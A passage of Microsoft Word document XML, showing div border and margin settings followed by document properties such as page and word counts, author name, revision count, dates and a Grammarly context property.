              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                <w:left w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                <w:bottom w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
                <w:right w:val="single" w:sz="2" w:space="0" w:color="D9D9E3"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="157751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9881534">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212403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D44B28-052E-764D-8CF8-AD39E3EF8F2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97</TotalTime>
  <Pages>16</Pages>
  <Words>3173</Words>
  <Characters>21615</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>313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GOPAL</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ABBY GOPAL</cp:lastModifiedBy>
  <cp:revision>106</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-26T05:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-29T03:57:00Z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documentId_466</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="grammarly_documentContext">
    <vt:lpwstr>{"goals":[],"domain":"general","emotions":[],"dialect":"american"}</vt:lpwstr>
  </property>
</Properties>
</file>